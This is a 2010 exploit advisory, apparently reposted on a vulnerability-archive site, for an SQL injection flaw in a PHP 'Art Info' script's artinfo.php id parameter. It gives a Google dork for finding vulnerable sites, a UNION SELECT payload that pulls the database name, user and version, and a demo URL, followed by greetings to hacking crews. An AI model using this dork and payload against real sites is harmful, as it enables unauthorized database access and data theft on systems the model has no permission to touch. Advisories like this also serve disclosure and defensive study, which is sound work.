PHP Art Info SQL Injection

2010.12.25
Credit: jos_ali_joe
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=============================================== PHP Art Info SQL Injection Vulnerability =============================================== [+]Title : PHP Art Info SQL Injection Vulnerability [+]Software : Art Info [+]Vendor : NN [+]Download : NN [+]Author : jos_ali_joe [+]Contact : josalijoe[at]hotmail[dot]com [+]Web : http://alicoder.wordpress.com/ ( New Blog jos_ali_joe ) [+]Home : http://indonesiancoder.com/ .___ .___ .__ _________ .___ | | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______ | | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \ | || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/ |___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ ######################################################################## Dork : inurl:"artinfo.php?id=" ######################################################################## ------------------------------------------------------------------------ SQL Exploit Exploit : +union+select+concat_ws(0x3a,database(),user(),version())-- Demo Exploit : http://localhost/[path]/artinfo.php?id=-2+union+select+concat_ws(0x3a,database(),user(),version())-- -------------------------------------------------------------------------- Greets For : ./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Magelang Cyber - Malang Cyber - kill-9 crew ./Byroe Net - Yogya Carderlink - aten4 - Wannabe Hacker - Tecon Crew - DuniaSantai.com - All Underground Forum Indonesia My Team : ./Indonesian Coder Special Thanks : Security Reason - Packetstorm Security [+] Note : Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top